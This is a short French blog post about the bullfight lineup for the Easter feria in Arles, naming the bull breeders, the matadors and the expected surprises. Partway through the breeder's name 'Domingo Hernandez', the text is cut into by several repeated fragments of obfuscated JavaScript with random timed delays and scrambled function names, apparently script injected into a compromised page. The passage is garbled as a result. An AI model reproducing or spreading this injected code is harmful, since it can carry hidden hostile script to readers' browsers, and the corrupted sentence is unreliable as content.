PAQUES EN ARLES : COMME D’HABITUDE

Le projet « 30 corridas – 30 évènements » initié par Morante de la Puebla n’a pas séduit les responsables des arènes d’Arles. Autres absences de marque : Sébastien Castella et Miguel Angel Perera. Les frères Luc et Marc Jalabert qui ont officialisé samedi les cartels de la feria de Pâques ont renouvelé leur cofiance aux toros de Domingo Hernandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andez et aux toreros El Juli, Juan Bautista et Jose Mari Manzanares, en vedette à la dernière feria du riz. Les toreros du cru n'ont pas été oublié. Les Miura, comme d'habitude, débouleront du toril le dimance de Pâques.
Bref, des cartels plutôt traditionnels. A notez quelques petites surprises : la présentation en France du jeune franco-mexicain Michelito, le retour de Miguel Abellan et l'arrivée de Paco Urena. Sans oublier la programmation d'une course camarguaise en matinée dominicale, qui donne à Arles un parfum particulier. Sera-ce suffisant pour séduire un large public ? Pas si sur !

Les commentaires sont fermés.